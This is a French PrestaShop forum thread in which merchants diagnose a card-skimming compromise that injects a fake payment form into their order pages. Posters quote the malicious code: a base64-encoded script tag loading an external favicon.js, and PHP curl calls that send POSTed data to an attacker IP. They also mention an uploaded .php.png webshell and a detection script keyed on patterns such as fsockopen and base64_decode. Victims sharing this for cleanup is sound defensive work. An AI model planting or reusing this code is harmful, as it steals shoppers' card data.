Jump to content

Appel script favicon.js malveillant sur les pages de commande


Recommended Posts

Bonjour

Dans le code de mes pages de commande, avant toute la structure classique de la page , se trouve une balise script qui appelle un script malveillant.

<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> 
<!DOCTYPE HTML> 
<!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]-->
<!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]-->
<!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]-->
<!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]-->
<html lang="fr-fr"><head><meta charset="utf-8" /><title>Comman   ......

Celui-ci ré-arrange le DOM pour s'incruster dedans et rajouter un petit formulaire dans la partie paiement (j'ai désactivé celui-ci)

Est-ce que quelqu'un a rencontré ce problème ?

Le problème m'a l'air assez complexe après 2 jours à retourner fichiers et BDD sans rien trouver de significatif.

Edit : Je suis sous Prestashop 1.6

 

Merci d'avance

Edited by Joseph Joestar (see edit history)

Share this post


Link to post
Share on other sites

C'est le meme. De ce que je comprends, ça vient injecter un nouveau moyen de paiement qui ressemble à ça :

image.png.b3e986ea9f139f59a215b33fe7991e9c.png

Je viens de trouver où il est injecté : c'est dans /class/controller/Controller.php et /controller/front/ParentOrderController.php

Le code est : base64_decode('PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiIHNyYz0iaHR0cHM6Ly93d3cuYXZpci5pci9pbWFnZS9mYXZpY29uLmpzIj48L3NjcmlwdD4=')

La date des deux fichiers n'ont pas été modifiées (dernieres modifs 2018 pour ma part).

Aucune idée pour le moment de par où l'assaillant est entré.

Share this post


Link to post
Share on other sites

Effectivement, j'avais bien ce formulaire d'injecté.

Je viens moi aussi de retrouver l'appel dans le fichier ParentOrderController dont la date de modification n'avait pas changé non plus chez moi.

Rien dans Controller.php par contre.

Pour la porte d'entrée, rien de très concluant. Peut être un passage via un code injecté dans le favicon.

Share this post


Link to post
Share on other sites

D'autres fichiers sont compromis :

/config/config.inc.php curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));

/controllers/admin/AdminLoginController.php  curl_init(base64_decode('aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9zdGF0eXN0aWNzLnBocA=='));

/classes/controller/Controller.php, tout à la fin : try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash'   => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch);  }} catch (Exception $e) {}

Share this post


Link to post
Share on other sites

24 minutes ago, Indy80 said:

J'ai eu le même problème sur un de mes shops sur 1.6 avant hier (uniquement le fichier controller.php). Est-ce que quelqu'un sait quel est le module responsable ? 

Non pas d'idée pour l'instant. Peut etre cartabandonedpro chez moi.

Share this post


Link to post
Share on other sites

7 minutes ago, Yoya said:

Non pas d'idée pour l'instant. Peut etre cartabandonedpro chez moi.

Effectivement on l'avait aussi mais désinstallé, je vais complètement le supprimer au cas où 

Share this post


Link to post
Share on other sites

Bonjour à tous, 
J'ai eu ce problème aussi je suis en PS 1.6 avec cartabandonedpro en 1.6.9. 
Je vais tout mettre à jour, mais j'aimerai avoir l'assurance que le problème vient bien de cartabandonedpro. 

Avez vous pu voir à travers de logs tout type d'exploitation à travers ce module ? 

Merci d'avance 😕 

  • Like 1

Share this post


Link to post
Share on other sites

1 hour ago, Poupipou said:

Bonjour à tous, 
J'ai eu ce problème aussi je suis en PS 1.6 avec cartabandonedpro en 1.6.9. 
Je vais tout mettre à jour, mais j'aimerai avoir l'assurance que le problème vient bien de cartabandonedpro. 

Avez vous pu voir à travers de logs tout type d'exploitation à travers ce module ? 

Merci d'avance 😕 

Non toujours pas sur malheureusment. Du coup on a mis en place un script pour voir si ça revient et pouvoir analyser le cheminement le cas échéant.

  • Like 1

Share this post


Link to post
Share on other sites

1 minute ago, Joseph Joestar said:

Quel genre de script ?

C'est un script qui va faire un état des lieux a un instant T de tous les patern de code un peu suspect "fsockopen", "base64_decode", "\\X0002" etc etc ... et passer toutes les X heures voir s'il y'a une différence avec l'état des lieux précédent.

  • Like 1

Share this post


Link to post
Share on other sites

Bonjour,

Pour info, ayant eu le problème récemment sur une boutique ne disposant pas du module cartabandonedpro, il s'agissait du module vm_advancedconfigurator. 

Il y avait eu un souci similaire avec le module jmsslider il y a un moment de cela.

 

La solution est de vérifier tous les modules permettant de faire de l'upload de fichier sans les renommer par la suite.

 

 

Share this post


Link to post
Share on other sites

Bonjour à tous,

Même soucis visiblement et détecté grâce à Malwarebyte même si je n'avais pas fait le lien avec mon site.
J'ai donc fait des recherches et j'en conclu que ce nouveau moyen de paiement viens donc de ce malware "avir.ir...."
J'ai visiblement les mêmes lignes de code que vous et mes fichiers datent de 2019 ! et ne se réveillent que 3 ans après...
Je n'ai jamais installé le module cartabandonedpro mais j'ai également déjà lu que ce module avait semé le trouble.
Moi j'ai cru que cela venait du module ets_megamenu (cru comprendre que également avait eu posé des soucis) mais comme je n'y connais pas grand chose et que je me sent tout petit en vous lisant, je ne sait pas quoi en déduire ni que faire.
Que faut il faire pour ce débarrasser de cette saleté ?
Pouvez-vous SVP donner des explications simples si vous y êtes parvenu car je ne suis pas sûr de tout saisir à vos explications, ni de savoir si vous y êtes arrivés et de comprendre comment vous y êtes parvenus (je ne suis pas calé).
Si quelqu'un pourrait détailler votre procédure pour la communauté ce serait génial :)

Un grand merci par avance.

 

 

Edited by bobby4722
ajout d'informations pertinentes (see edit history)

Share this post


Link to post
Share on other sites

Bonjour pour ceux qui ont le module "cartabandonedpro" avez vous remarquez des fichiers bizarre dans le dossier "modules\cartabandonmentpro\uploads". 
Car j'ai ce que je pense un webshell en ".php.png" qui est vide. 

Cordialement. 

Share this post


Link to post
Share on other sites

Bonjour à tous,

J'ai pu retirer le faux module de saisi de carte bancaire en regardant vos informations sur la page de paiement.
J'avais bien des instructions avec noté en base64 sur deux fichiers (j'y connais rien mais je sais que le code peut être invisible).
J'avais par chance un sauvegarde de mon site et donc de ces fichiers, que j'ai remplacés.
J'ai renommé l’accès admin du BO.
J'ai noté que, les deux fichiers incriminés dataient de Juin 2019 sur mon site en prod et de Aout 2019 sur la copie de sauvegarde...incroyable !

Comme je ne savais pas me servir du SSH (pas installé ni ne sais trop comment cela marche) j'ai essayé d'apprendre depuis quelque jours mais OVH me pose soucis et impossible de lancer un scan en SSH comme vous l'indiquiez...je n'arrive pas à accéder à mon espace SSH.

En revanche même si le faux module de paiement à disparu, j'ai toujours des erreurs 404 ou des pages qui ne se chargent pas sutout sur la page de selection duchoix du paiement.
Avez-vous un conseil à me donner SVP ?
Je n'ai pas le module cartabonementpro ni jamais installé.
En vous remerciant.

Share this post


Link to post
Share on other sites

Bonjour,

Pour ceux dont la porte d'entrée était le module cartabondementpro, si vous regardez dans le dossier uploads du module, avez vous aussi en meme "Unleash the goddamn kraken", une capture d'écran du méthode de paiement ATOS ainsi qu'un fichier ".php.png" ?

Si oui, ça créé une piste, Kraken est un exchange de crypto, donc le hackeur utilise donc peut-être cet exchange pour dissimuler l'argent des cartes sur le blockchain. Spéculatif. Eventuellement, ça peut valoir le coup en cas de victime connu, de demander à Kraken si ils peuvent remonter la piste à partir des détails d'une carte bancaire.

Sur un des deux sites qui ont été hackés chez nous pour l'instant, le fichier ".php.png" commence par "baja" ce qui fait penser à "bajatax" qui est un hackeur assez connu qui en a fait d'autres.

Voilà quelques pistes.

Cordialement,

Share this post


Link to post
Share on other sites

3 minutes ago, jbunning said:

@poupinou bien possible.

Oui le fichier était aussi vide de mon côté.

hmmm et vous avez pensez à regarder les access log d'apache tous les 200 OK qui tapent sur /modules/cartabandonmentpro/upload.php ? 

Car personnellement je ne vois que des POST ou des GET mais à aucun moment il y a un appel vers un fichier en paramètre comme quelque chose de similaire: 
 

/modules/cartabandonmentpro/upload.php?baja.php.png=<faireuneaction>


C'est ça qui je pense me choque le plus. 

Share this post


Link to post
Share on other sites

Alors je ne sais pas quel est le souci exactement sur cartabandonmentpro mais l'appel à trouver sera plutôt /modules/cartabandonmentpro/<le-dossier-ou-les-fichiers-sont-uploadés>/baja.php.png

Si le fichier est vide, c'est que le code en a été supprimé. En général, le fichier complet est supprimé si possible.

Share this post


Link to post
Share on other sites

  • 3 months later...

Bonjour,

 

J'ai exactement ce problème sur un prestashop 1.6

J'ai nettoyé les fichiers

AdminLoginController.php

config.inc.php

ParentOrderController.php

Shop.php

Pour revenir à une situation conforme à avant le problème.

J4ai recherché toutes les itérations à "base64_decode('" pour veiller à bien tout traiter.

J'ai vidé le cache navigateur et prestashop. Pourtant rien n'y fait.

Le formulaire de paiement injecté est toujours présent sur la page de commande. L'appel au fichier js https://www.avir.ir/image/favicon.js également.

Quelqu'un a t'il une piste?

Merci.

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

Cookies ensure the smooth running of our services. Using these, you accept the use of cookies. Learn More